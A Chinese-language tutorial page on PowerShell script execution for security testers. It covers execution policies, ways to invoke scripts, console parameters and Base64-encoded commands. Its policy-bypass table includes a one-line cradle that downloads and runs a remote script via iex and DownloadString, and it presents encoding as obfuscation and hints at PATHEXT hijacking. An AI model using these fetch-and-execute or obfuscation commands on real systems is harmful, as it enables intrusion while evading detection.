
<!DOCTYPE HTML>
<html lang="zh-Hans">
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>脚本编写与执行 · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="4. Scoket网络编程.html" />
    
    
    <link rel="prev" href="2. 基础.html" />
    

    </head>
    <body>
        
<div class="book">

    <div class="book-body">
        
            <div class="body-inner">
                
                    





                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="powershell3-&#x811A;&#x672C;&#x6267;&#x884C;&#x57FA;&#x7840;">Powershell(3)-&#x811A;&#x672C;&#x6267;&#x884C;&#x57FA;&#x7840;</h1>
<h2 id="&#x5F00;&#x59CB;&#x4E4B;&#x524D;">&#x5F00;&#x59CB;&#x4E4B;&#x524D;</h2>
<p>&#x6211;&#x4EEC;&#x5728;&#x5F00;&#x59CB;&#x4E4B;&#x524D;&#x5148;&#x6765;&#x4ECB;&#x7ECD;&#x5728;windows&#x5E73;&#x53F0;&#x4E2D;&#x5E38;&#x7528;&#x5230;&#x7684;&#x51E0;&#x79CD;&#x811A;&#x672C;</p>
<h3 id="bat">Bat</h3>
<p>&#x8FD9;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x5E38;&#x7528;&#x7684;Bat&#x811A;&#x672C;&#xFF0C;&#x5168;&#x540D;&#x4E3A;&#x6279;&#x5904;&#x7406;&#x6587;&#x4EF6;&#xFF0C;&#x811A;&#x672C;&#x4E2D;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x5728;CMD&#x4E2D;&#x4F7F;&#x7528;&#x5230;&#x7684;&#x547D;&#x4EE4;&#xFF0C;&#x8FD9;&#x91CC;&#x63D0;&#x4E00;&#x4E2A;&#x5C0F;&#x95EE;&#x9898;&#xFF1A;
CMD&#x7684;&#x547D;&#x4EE4;&#x884C;&#x6267;&#x884C;&#x547D;&#x4EE4;&#x7684;&#x4F18;&#x5148;&#x7EA7;&#x662F;<code>.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH</code>&#xFF0C;&#x90A3;&#x4E48;&#x5047;&#x5982;&#x6211;&#x901A;&#x8FC7;&#x4FEE;&#x6539;PATHEXT&#x89E3;&#x6790;&#x987A;&#x5E8F;&#x540E;&#x653E;&#x4E00;&#x4E2A;cmd.bat&#x5728;system32&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x90A3;&#x4E48;&#x4F18;&#x5148;&#x6267;&#x884C;&#x7684;&#x662F;cmd.bat&#xFF0C;&#x8FD9;&#x91CC;&#x9762;&#x7684;&#x5185;&#x5BB9;&#x5C31;&#x53D8;&#x5F97;&#x4E0D;&#x53EF;&#x63CF;&#x8FF0;&#x8D77;&#x6765;&#x4E86;</p>
<h3 id="vbscript">VBscript</h3>
<p>&#x6267;&#x884C;vbs&#x5C31;&#x662F;&#x5E38;&#x8BF4;&#x7684;vbscript,&#x662F;&#x5FAE;&#x8F6F;&#x4E3A;&#x4E86;&#x65B9;&#x4FBF;&#x81EA;&#x52A8;&#x5316;&#x7BA1;&#x7406;windows&#x800C;&#x63A8;&#x51FA;&#x7684;&#x811A;&#x672C;&#x8BED;&#x8A00;&#xFF0C;&#x8FD9;&#x91CC;&#x4E86;&#x89E3;&#x4E00;&#x4E0B;&#x5373;&#x53EF;&#xFF0C;&#x4E0D;&#x662F;&#x6587;&#x7AE0;&#x91CD;&#x70B9;&#x3002;</p>
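<pre><code class="lang-vbs"><span class="hljs-comment">' Small example: enumerate processes through WMI from VBScript.</span>
<span class="hljs-comment">' Bind to the local WMI service through the winmgmts: moniker.</span>
<span class="hljs-keyword">Set</span> wmi = <span class="hljs-built_in">GetObject</span>(<span class="hljs-string">&quot;winmgmts:&quot;</span>)
<span class="hljs-comment">' Run a WQL query that returns one object per running process.</span>
<span class="hljs-keyword">Set</span> collection = wmi.ExecQuery(<span class="hljs-string">&quot;select * from Win32_Process&quot;</span>)
<span class="hljs-comment">' Print every Win32_Process instance as MOF text.</span>
<span class="hljs-keyword">For</span> <span class="hljs-keyword">Each</span> process <span class="hljs-keyword">in</span> collection
WScript.Echo process.getObjectText_
<span class="hljs-keyword">Next</span>
</code></pre>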
<h2 id="powershell">Powershell</h2>
<p>&#x8FD9;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x7684;&#x4E3B;&#x89D2;&#xFF0C;&#x5728;&#x73B0;&#x5728;&#x548C;&#x672A;&#x6765;&#x4E00;&#x5B9A;&#x662F;powershell&#x5360;&#x636E;&#x4E3B;&#x8981;&#x5730;&#x4F4D;(&#x5BF9;&#x4E8E;&#x8FD9;&#x4E00;&#x70B9;&#x641E;Win&#x591A;&#x4E00;&#x70B9;&#x7684;&#x670B;&#x53CB;&#x4E00;&#x5B9A;&#x4E0D;&#x4F1A;&#x6000;&#x7591;)&#xFF0C;&#x9996;&#x5148;&#x6211;&#x4EEC;&#x6765;&#x770B;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;&#x4F8B;&#x5B50;</p>
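<pre><code class="lang-powershell"><span class="hljs-comment"># --- script.ps1 ---</span>
<span class="hljs-comment"># Defines test-conn, which sends two echo requests to the host(s) passed as arguments.</span>
<span class="hljs-keyword">function</span> test-conn { Test-Connection  -Count <span class="hljs-number">2</span> -ComputerName <span class="hljs-variable">$args</span>}

<span class="hljs-comment"># --- in the console ---</span>
<span class="hljs-comment"># Dot-source the script (dot, space, path) so test-conn is defined in the current session.</span>
<span class="hljs-comment"># Running .\script.ps1 directly defines the function only in the script's own scope.</span>
. .\script.ps1

<span class="hljs-comment"># Call the function that was just loaded.</span>
test-conn localhost
</code></pre>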
<h3 id="powershell&#x6267;&#x884C;&#x7B56;&#x7565;">Powershell&#x6267;&#x884C;&#x7B56;&#x7565;</h3>
<p>那么你可能会在调用脚本的时候出现报错，这是由powershell的执行策略导致的，下面我们来了解一下执行策略：
PowerShell 提供了 Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined 六种类型的执行策略。需要注意，执行策略并不是安全边界，它的作用是防止用户无意中运行脚本，而不是阻止有意的执行。
简单介绍各种策略如下：</p>
<table>
<thead>
<tr>
<th style="text-align:left">&#x540D;&#x79F0;</th>
<th style="text-align:left">&#x8BF4;&#x660E;</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">Restricted</td>
<td style="text-align:left">&#x53D7;&#x9650;&#x5236;&#x7684;&#xFF0C;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x5355;&#x4E2A;&#x7684;&#x547D;&#x4EE4;&#xFF0C;&#x4F46;&#x662F;&#x4E0D;&#x80FD;&#x6267;&#x884C;&#x811A;&#x672C;Windows 8, Windows Server 2012, and Windows 8.1&#x4E2D;&#x9ED8;&#x8BA4;&#x5C31;&#x662F;&#x8FD9;&#x79CD;&#x7B56;&#x7565;&#xFF0C;&#x6240;&#x4EE5;&#x662F;&#x4E0D;&#x80FD;&#x6267;&#x884C;&#x811A;&#x672C;&#x7684;&#xFF0C;&#x6267;&#x884C;&#x5C31;&#x4F1A;&#x62A5;&#x9519;&#xFF0C;&#x90A3;&#x4E48;&#x5982;&#x4F55;&#x624D;&#x80FD;&#x6267;&#x884C;&#x5462;&#xFF1F;Set-ExecutionPolicy -ExecutionPolicy Bypass&#x5C31;&#x662F;&#x8BBE;&#x7F6E;&#x7B56;&#x7565;&#x4E3A;Bypass&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x811A;&#x672C;&#x4E86;&#x3002;</td>
</tr>
<tr>
<td style="text-align:left">AllSigned</td>
<td style="text-align:left">AllSigned &#x6267;&#x884C;&#x7B56;&#x7565;&#x5141;&#x8BB8;&#x6267;&#x884C;&#x6240;&#x6709;&#x5177;&#x6709;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x7684;&#x811A;&#x672C;</td>
</tr>
<tr>
<td style="text-align:left">RemoteSigned</td>
<td style="text-align:left">&#x5F53;&#x6267;&#x884C;&#x4ECE;&#x7F51;&#x7EDC;&#x4E0A;&#x4E0B;&#x8F7D;&#x7684;&#x811A;&#x672C;&#x65F6;&#xFF0C;&#x9700;&#x8981;&#x811A;&#x672C;&#x5177;&#x6709;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#xFF0C;&#x5426;&#x5219;&#x4E0D;&#x4F1A;&#x8FD0;&#x884C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x3002;&#x5982;&#x679C;&#x662F;&#x5728;&#x672C;&#x5730;&#x521B;&#x5EFA;&#x7684;&#x811A;&#x672C;&#x5219;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x6267;&#x884C;&#xFF0C;&#x4E0D;&#x8981;&#x6C42;&#x811A;&#x672C;&#x5177;&#x6709;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x3002;</td>
</tr>
<tr>
<td style="text-align:left">Unrestricted</td>
<td style="text-align:left">&#x8FD9;&#x662F;&#x4E00;&#x79CD;&#x6BD4;&#x8F83;&#x5BBD;&#x5BB9;&#x7684;&#x7B56;&#x7565;&#xFF0C;&#x5141;&#x8BB8;&#x8FD0;&#x884C;&#x672A;&#x7B7E;&#x540D;&#x7684;&#x811A;&#x672C;&#x3002;&#x5BF9;&#x4E8E;&#x4ECE;&#x7F51;&#x7EDC;&#x4E0A;&#x4E0B;&#x8F7D;&#x7684;&#x811A;&#x672C;&#xFF0C;&#x5728;&#x8FD0;&#x884C;&#x524D;&#x4F1A;&#x8FDB;&#x884C;&#x5B89;&#x5168;&#x6027;&#x63D0;&#x793A;&#x3002;&#x9700;&#x8981;&#x4F60;&#x786E;&#x8BA4;&#x662F;&#x5426;&#x6267;&#x884C;&#x811A;&#x672C;</td>
</tr>
<tr>
<td style="text-align:left">Bypass</td>
<td style="text-align:left">Bypass &#x6267;&#x884C;&#x7B56;&#x7565;&#x5BF9;&#x811A;&#x672C;&#x7684;&#x6267;&#x884C;&#x4E0D;&#x8BBE;&#x4EFB;&#x4F55;&#x7684;&#x9650;&#x5236;&#xFF0C;&#x4EFB;&#x4F55;&#x811A;&#x672C;&#x90FD;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#xFF0C;&#x5E76;&#x4E14;&#x4E0D;&#x4F1A;&#x6709;&#x5B89;&#x5168;&#x6027;&#x63D0;&#x793A;&#x3002;</td>
</tr>
<tr>
<td style="text-align:left">Undefined</td>
<td style="text-align:left">Undefined &#x8868;&#x793A;&#x6CA1;&#x6709;&#x8BBE;&#x7F6E;&#x811A;&#x672C;&#x7B56;&#x7565;&#x3002;&#x5F53;&#x7136;&#x6B64;&#x65F6;&#x4F1A;&#x53D1;&#x751F;&#x7EE7;&#x627F;&#x6216;&#x5E94;&#x7528;&#x9ED8;&#x8BA4;&#x7684;&#x811A;&#x672C;&#x7B56;&#x7565;&#x3002;</td>
</tr>
</tbody>
</table>
<p>&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5982;&#x4F55;&#x7ED5;&#x8FC7;&#x8FD9;&#x4E9B;&#x5B89;&#x5168;&#x7B56;&#x7565;&#x5462;&#xFF1F;&#x4E0B;&#x9762;&#x63D0;&#x4F9B;&#x51E0;&#x79CD;&#x65B9;&#x6CD5;&#xFF0C;&#x7F51;&#x4E0A;&#x8FD8;&#x6709;&#x5F88;&#x591A;&#x7684;&#x7ED5;&#x8FC7;&#x65B9;&#x6CD5;&#xFF0C;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x81EA;&#x884C;&#x7814;&#x7A76;&#xFF1A;</p>
<table>
<thead>
<tr>
<th style="text-align:left">&#x540D;&#x79F0;</th>
<th style="text-align:left">&#x8BF4;&#x660E;</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">Get-ExecutionPolicy</td>
<td style="text-align:left">&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7684;&#x6267;&#x884C;&#x7B56;&#x7565;</td>
</tr>
<tr>
<td style="text-align:left">Get-Content .\test.ps1 | powershell.exe -noprofile -</td>
<td style="text-align:left">通过管道输入进ps</td>
</tr>
<tr>
<td style="text-align:left">powershell -nop -c &quot;iex(New-Object Net.WebClient).DownloadString(&apos;<a href="http://192.168.1.2/test.ps1" target="_blank">http://192.168.1.2/test.ps1</a>&apos;)&quot;</td>
<td style="text-align:left">&#x901A;&#x8FC7;&#x8FDC;&#x7A0B;&#x4E0B;&#x8F7D;&#x811A;&#x672C;&#x6765;&#x7ED5;&#x8FC7;</td>
</tr>
<tr>
<td style="text-align:left">$command = &quot;Write-Host &apos;Hello World!&apos;&quot;<br>$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) <br>$encodedCommand = [Convert]::ToBase64String($bytes) <br>powershell.exe -EncodedCommand $encodedCommand</td>
<td style="text-align:left">&#x901A;&#x8FC7;BASE64&#x7F16;&#x7801;&#x6267;&#x884C;</td>
</tr>
</tbody>
</table>
<h3 id="powershell&#x7684;&#x811A;&#x672C;&#x8C03;&#x7528;&#x65B9;&#x6CD5;&#xFF1A;">powershell&#x7684;&#x811A;&#x672C;&#x8C03;&#x7528;&#x65B9;&#x6CD5;&#xFF1A;</h3>
<ol>
<li>&#x5982;&#x679C;&#x811A;&#x672C;&#x662F;&#x76F4;&#x63A5;&#x5199;&#x7684;&#x4EE3;&#x7801;&#x800C;&#x4E0D;&#x662F;&#x53EA;&#x5B9A;&#x4E49;&#x4E86;&#x51FD;&#x6570;&#x90A3;&#x4E48;&#x76F4;&#x63A5;&#x6267;&#x884C;&#x811A;&#x672C;.\script.ps1&#x5373;&#x53EF;</li>
<li>&#x4F46;&#x662F;&#x5982;&#x679C;&#x662F;&#x8F7D;&#x5165;&#x91CC;&#x9762;&#x7684;&#x51FD;&#x6570;&#x9700;&#x8981;<code>.+&#x7A7A;&#x683C;+.\script.ps1</code></li>
<li>&#x6216;&#x8005;&#x4F7F;&#x7528;Import-Module .\script.ps1, &#x8FD9;&#x6837;&#x624D;&#x80FD;&#x76F4;&#x63A5;&#x4F7F;&#x7528;&#x811A;&#x672C;&#x7684;&#x51FD;&#x6570;</li>
</ol>
<h2 id="&#x901A;&#x8FC7;&#x63A7;&#x5236;&#x53F0;&#x6267;&#x884C;powershell">&#x901A;&#x8FC7;&#x63A7;&#x5236;&#x53F0;&#x6267;&#x884C;Powershell</h2>
<p>&#x5BF9;&#x4E8E;&#x6211;&#x4EEC;&#x5B89;&#x5168;&#x6D4B;&#x8BD5;&#x4EBA;&#x5458;&#x901A;&#x5E38;&#x83B7;&#x53D6;&#x5230;&#x7684;&#x4E00;&#x4E2A;Shell&#x662F;CMD&#x7684;, &#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x60F3;&#x8981;&#x5C3D;&#x53EF;&#x80FD;&#x5C11;&#x7684;&#x64CD;&#x4F5C;&#x5C31;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x901A;&#x8FC7;&#x63A7;&#x5236;&#x53F0;&#x6765;&#x6267;&#x884C;powershell&#x7684;&#x547D;&#x4EE4;, &#x90A3;&#x4E48;&#x5148;&#x6765;&#x770B;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;&#x4F8B;&#x5B50;:</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps3/1.png" alt="">
&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x6211;&#x4EEC;&#x901A;&#x8FC7;CMD&#x754C;&#x9762;&#x6267;&#x884C;&#x4E86;Powershell&#x7684;&#x4EE3;&#x7801;, &#x90A3;&#x4E48;&#x5176;&#x5B9E;&#x8FD9;&#x6837;&#x7684;&#x6267;&#x884C;&#x65B9;&#x5F0F;&#x5728;&#x771F;&#x5B9E;&#x7684;&#x5B89;&#x5168;&#x6D4B;&#x8BD5;&#x73AF;&#x5883;&#x4E2D;&#x5229;&#x7528;&#x66F4;&#x591A;, &#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4E2A;Powershell&#x901A;&#x8FC7;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x6267;&#x884C;&#x7684;&#x6240;&#x6709;&#x53EF;&#x9009;&#x7684;&#x53C2;&#x6570;:</p>
<pre><code class="lang-powershell">PowerShell[.exe]
       [-PSConsoleFile &lt;file&gt; | -Version &lt;version&gt;]
       [-EncodedCommand &lt;Base64EncodedCommand&gt;]
       [-ExecutionPolicy &lt;ExecutionPolicy&gt;]
       [-File &lt;filePath&gt; &lt;args&gt;]
       [-InputFormat {Text | XML}] 
       [-NoExit]
       [-NoLogo]
       [-NonInteractive] 
       [-NoProfile] 
       [-OutputFormat {Text | XML}] 
       [-Sta]
       [-WindowStyle &lt;style&gt;]
       [-Command { - | &lt;script-block&gt; [-args &lt;arg-array&gt;]
                     | &lt;string&gt; [&lt;CommandParameters&gt;] } ]

PowerShell[.exe] -Help | -? | /?
</code></pre>
<table>
<thead>
<tr>
<th style="text-align:left">&#x540D;&#x79F0;</th>
<th style="text-align:left">&#x89E3;&#x91CA;</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">-Command</td>
<td style="text-align:left">&#x9700;&#x8981;&#x6267;&#x884C;&#x7684;&#x4EE3;&#x7801;</td>
</tr>
<tr>
<td style="text-align:left">-ExecutionPolicy</td>
<td style="text-align:left">&#x8BBE;&#x7F6E;&#x9ED8;&#x8BA4;&#x7684;&#x6267;&#x884C;&#x7B56;&#x7565;&#xFF0C;&#x4E00;&#x822C;&#x4F7F;&#x7528;Bypass</td>
</tr>
<tr>
<td style="text-align:left">-EncodedCommand</td>
<td style="text-align:left">&#x6267;&#x884C;Base64&#x4EE3;&#x7801;</td>
</tr>
<tr>
<td style="text-align:left">-File</td>
<td style="text-align:left">&#x8FD9;&#x662F;&#x9700;&#x8981;&#x6267;&#x884C;&#x7684;&#x811A;&#x672C;&#x540D;</td>
</tr>
<tr>
<td style="text-align:left">-NoExit</td>
<td style="text-align:left">&#x6267;&#x884C;&#x5B8C;&#x6210;&#x547D;&#x4EE4;&#x4E4B;&#x540E;&#x4E0D;&#x4F1A;&#x7ACB;&#x5373;&#x9000;&#x51FA;&#xFF0C;&#x6BD4;&#x5982;&#x6211;&#x4EEC;&#x6267;&#x884C;powerhsell whoami &#x6267;&#x884C;&#x5B8C;&#x6210;&#x4E4B;&#x540E;&#x4F1A;&#x63A8;&#x51FA;&#x6211;&#x4EEC;&#x7684;PS&#x4F1A;&#x8BDD;&#xFF0C;&#x5982;&#x679C;&#x6211;&#x4EEC;&#x52A0;&#x4E0A;&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#xFF0C;&#x8FD0;&#x884C;&#x5B8C;&#x4E4B;&#x540E;&#x8FD8;&#x662F;&#x4F1A;&#x7EE7;&#x7EED;&#x505C;&#x7559;&#x5728;PS&#x7684;&#x754C;&#x9762;</td>
</tr>
<tr>
<td style="text-align:left">-NoLogo</td>
<td style="text-align:left">&#x4E0D;&#x8F93;&#x51FA;PS&#x7684;Banner&#x4FE1;&#x606F;</td>
</tr>
<tr>
<td style="text-align:left">-Noninteractive</td>
<td style="text-align:left">&#x4E0D;&#x5F00;&#x542F;&#x4EA4;&#x4E92;&#x5F0F;&#x7684;&#x4F1A;&#x8BDD;</td>
</tr>
<tr>
<td style="text-align:left">-NoProfile</td>
<td style="text-align:left">&#x4E0D;&#x4F7F;&#x7528;&#x5F53;&#x524D;&#x7528;&#x6237;&#x4F7F;&#x7528;&#x7684;&#x914D;&#x7F6E;&#x6587;&#x4EF6;</td>
</tr>
<tr>
<td style="text-align:left">-Sta</td>
<td style="text-align:left">&#x4EE5;&#x5355;&#x7EBF;&#x7A0B;&#x6A21;&#x5F0F;&#x542F;&#x52A8;ps</td>
</tr>
<tr>
<td style="text-align:left">-Version</td>
<td style="text-align:left">&#x8BBE;&#x7F6E;&#x7528;&#x4EC0;&#x4E48;&#x7248;&#x672C;&#x53BB;&#x6267;&#x884C;&#x4EE3;&#x7801;</td>
</tr>
<tr>
<td style="text-align:left">-WindowStyle</td>
<td style="text-align:left">&#x8BBE;&#x7F6E;Powershell&#x7684;&#x6267;&#x884C;&#x7A97;&#x53E3;&#xFF0C;&#x6709;&#x4E0B;&#x9762;&#x7684;&#x53C2;&#x6570;Normal, Minimized, Maximized, or Hidden</td>
</tr>
</tbody>
</table>
<p>&#x6700;&#x540E;&#x4E3E;&#x4E00;&#x4E2A;&#x6267;&#x884C;Base64&#x4EE3;&#x7801;&#x7684;&#x4F8B;&#x5B50;:</p>
<ol>
<li>我们先使用上面表格中提到的编码代码对命令<code>whoami</code>进行编码, 得到字符串:<code>dwBoAG8AYQBtAGkACgA=</code></li>
<li>&#x901A;&#x8FC7;&#x4E0B;&#x9762;&#x7684;&#x547D;&#x4EE4;&#x6765;&#x6267;&#x884C;&#x4EE3;&#x7801;</li>
</ol>
<pre><code class="lang-powershell">powershell -EncodedCommand dwBoAG8AYQBtAGkACgA=
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps3/2.png" alt=""></p>
<p>那么这种需求在什么地方呢? 比如我们的代码特别长或者会引起一些歧义的时候就需要我们使用这种方式去执行, 同时也是一个混淆的方式。不过Base64只是编码而不是加密：开启脚本块日志（事件ID 4104）后，解码后的内容仍会被记录，带有 -EncodedCommand 的命令行本身也是常见的检测点。</p>

                                
                                </section>
                            
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                
            
        
    </div>

</div>

        
        
    

    </body>
</html>

